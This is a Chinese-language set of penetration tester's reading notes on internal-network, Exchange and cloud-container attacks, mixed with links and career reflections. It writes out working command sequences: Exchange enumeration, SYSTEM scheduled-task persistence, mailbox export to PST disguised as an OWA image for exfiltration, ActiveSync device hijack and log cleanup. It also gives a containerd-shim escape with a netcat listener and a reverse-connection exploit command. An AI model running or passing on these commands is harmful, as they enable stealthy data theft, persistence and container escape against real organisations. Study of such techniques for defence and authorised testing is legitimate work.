2021-Read-article

有兴趣可以看看我的云渗透课程:https://www.yuque.com/u8047536/supvqp/ri4ft0

渗透

https://github.com/ihebski/DefaultCreds-cheat-sheet

网络设备默认密码

标题描述有问题,泄漏机器user_id等,通过websocket获取token,再利用token通过相关的API来执行机器中的命令;

关于Blind SSRF利用

SUDO提权: make && ./sudo-hax-me-a-sandwich

https://github.com/Kyuu-Ji/Awesome-Azure-Pentest

Azure渗透测试资料

https://afinepl.medium.com/testing-and-exploiting-java-deserialization-in-2021-e762f3e43ca2

Java反序列化

2020年演练通过云原生突破进入内网;

容器环境收集收集技巧,Docker逃逸一些技巧和漏洞利用

编排组件API配置不当等:kubelet、etcd、dashboard

通过代理脚本判断之后执行命令

Atomic Red Team一直专注于传统的Windows端口,其实大部分云基础设施都是在Linux上运行

内存中不落地执行,避免针对文件内容的检测,在本进程加载执行BOF中的功能代码。

通过读取data.mdb中的证书,通过证书请求获取管理员cookie

国外公开渗透测试报告模板

内网渗透

使用Get-ManagementRoleAssignment获取用户列表
C:\Windows\system32\cmd.exe /C powershell.exe -PSConsoleFile exshell.psc1 -Command "Get-ManagementRoleAssignment -GetEffectiveUsers | select Name,Role,EffectiveUserName,AssignmentMethod,IsValid | ConvertTo-Csv -NoTypeInformation | % {$_ -replace ‘`n’,’_’} | Out-File C:\temp\1.xml"
 
获取虚拟目录配置信息
C:\Windows\system32\cmd.exe /C powershell.exe -PSConsoleFile exshell.psc1 -Command "Get-WebServicesVirtualDirectory | Format-List"
 
查询组织管理成员,sqlceip.exe其实是ADFind.exe
C:\Windows\system32\cmd.exe /C sqlceip.exe -default -f (name="Organization Management") member -list | sqlceip.exe -f objectcategory=* > .\SettingSync\log2.txt
 
创建计划任务
$scheduler = New-Object -ComObject ("Schedule.Service");$scheduler.Connect($env:COMPUTERNAME);$folder = $scheduler.GetFolder("\Microsoft\Windows\SoftwareProtectionPlatform");$task = $folder.GetTask(“EventCacheManager”);$definition = $task.Definition;$definition.Settings.ExecutionTimeLimit = “PT0S”;$folder.RegisterTaskDefinition($task.Name,$definition,6,”System”,$null,5);echo “Done”
 
C:\Windows\system32\cmd.exe /C schtasks /create /F /tn “\Microsoft\Windows\SoftwareProtectionPlatform\EventCacheManager” /tr “C:\Windows\SoftwareDistribution\EventCacheManager.exe” /sc ONSTART /ru system /S [machine_name] 
 
密取数据:
使用New-MailboxExportRequest 和 Get-MailboxExport-Request 命令从邮箱中窃取数据
C:\Windows\system32\cmd.exe /C powershell.exe -PSConsoleFile exshell.psc1 -Command “New-MailboxExportRequest -Mailbox foobar@organization.here -ContentFilter {(Received -ge ’03/01/2020′)} -FilePath ‘\\<MAILSERVER>\c$\temp\b.pst'”
 
7z打包加密
C:\Windows\system32\cmd.exe /C .\7z.exe a -mx9 -r0 -p[33_char_password]  “C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Redir.png” C:\Temp\b.pst
 
https://owa.organization.here/owa/auth/Redir.png
\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\
 
同步邮件
C:\Windows\system32\cmd.exe /C powershell.exe -PSConsoleFile exshell.psc1 -Command “Set-CASMailbox -Identity <UserID> -ActiveSyncAllowedDeviceIDs @{add=’XXXXXXXXXXXXX’}"
 
清除记录:
C:\Windows\system32\cmd.exe /C powershell.exe -PSConsoleFile exshell.psc1 -Command "Get-MailboxExportRequest -Mailbox user@organization.here | Remove-MailboxExportRequest -Confirm:$False"

schtasks.exe /create /tn test /tr "calc.exe" /sc minute /mo 1 /ru "administrator"

云安全

在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。
POC下载:https://github.com/Xyntax/CDK/releases/tag/0.1.6
cat /proc/net/unix|grep -a "containerd-shim"
原理备注:containerd->containerd-shim->runc 的通信模型中,containerd-shim的接口作为abstract unix socket暴露,在docker使用--net=host参数启动、与宿主机共享net namespace时,其中的unix socket可以被容器内部访问到,容器中攻击者通过该socket可以通过API控制下游runc进程启动新的恶意镜像,并通过该镜像逃逸。
Attack:nc -lvp 12345
Client:./cdk_linux_386 run shim-pwn 192.168.163.131 12345
关于K8s容器安全渗透,腾讯蓝军已经研究的很深,安全人员研究的方向应该看向运维,看他们使用哪些系统等;
攻击者又转而对其中一种称之为云函数(FaaS,Function as a Service)
滥用云函数作为攻击前置的方法早在2018年就被提出
增强基础设施在伪装性、探测监控及溯源反制等方面的能力
随着攻防对抗形势的白热化发展,对抗升级的过程愈发对OPSEC提出了更高的要求

介绍每一层的应用以及工作原理

Other

第一阶段 炼气期:Kubernetes 基本概念和使用方法
第二阶段 筑基期:容器调度的基本流程
第三阶段 金丹期:K8s排错
第四阶段 元婴期:加深对各个资源的理解
第五阶段 化神期:深入学习 Kubernetes 架构和组件能力
第六阶段 练虚期:K8s二次开发
第七阶段 大乘期:跟踪更新动态
  • [跨越攻防的壁垒]
广度:攻防技术点,单点对抗与绕过;
深度:完整攻击演习,隐蔽性、躲避检测;
探索:攻击面、风险盲点、举一反三;
零信任:网络接入、远程办公、用户认证;
云原生:业务形态、虚拟化、Docker、K8s、微服务、应用网关
金融科技:数字资产转化升级、深入业务流程、APT风险面
 
对抗实战:
第一要素:战术思路、执行规范、行动计划
APT手法、技术手法灵活运用、从漏洞利用对抗,到用户行为分析对抗,绕过安全系统
代码能力、全栈业务能力(逆向、密码学)
 
能力提升与成长
广泛情报来源、外部资源、0day等;
知识体系、武器库、自动化;
解决重要技术难题:重要/核心问题、前沿、解决方案优雅、突破限制
总结、提炼、升华:解决问题思路和方法,升华为方法论
帮助、合作、推广:建立交流合作、演讲共享
 
提升技术影响力路径:
专才到通才:志为某一个技术方向专家
小组到业界:先在小组产生技术影响力、扩大到中心、部门、BG、扩大到公司内外;
成为第一个:第一个提出某种有影响力的理论或技术、实现别人认为不可能实现的有影响力的系统
领导和引领技术发展
 
时刻准备:掌握坚实宽广理论基础和系统深入的专业知识、良好的心理素质
抓住机遇:直觉和洞察力,思考重要的问题,判断发展趋势,洞察前沿工作的潜在意义
创造机遇:与人交流合作,发现和创造机会,善于跳出思维限制、尝试多领域、跨学科研究技术解决方案
知识图谱其本质是为了表示知识,意指透过经验或联想,而能够熟悉进而了解某件事情;
亦指透过研究、调查、观察或经验而获得的一整套知识或一系列资讯。
知识图谱主要解决的问题是一个复杂关联信息的查询和表示。
 
偏向于情报分析
对手是谁(Who):包括威胁行为体,赞助商和雇主
对手使用什么(What):包括他们的能力和基础设施
对手的行动时(When):确定行动的时间表和规律
对手的目的(Why):包括他们的动机和意图
对手的目标行业和地理区域(Where):详细说明行业,垂直行业和地理区域
对手如何运作(How):关注于他们的行为和规律
 
做安全的最终目的,还是说为了提高总体的安全能力,这个安全能力小到个人水平,大到国家安全。

前期阅读文章时记录的格式和以前不一样,现在转换成markdown较为麻烦,有空就更新一下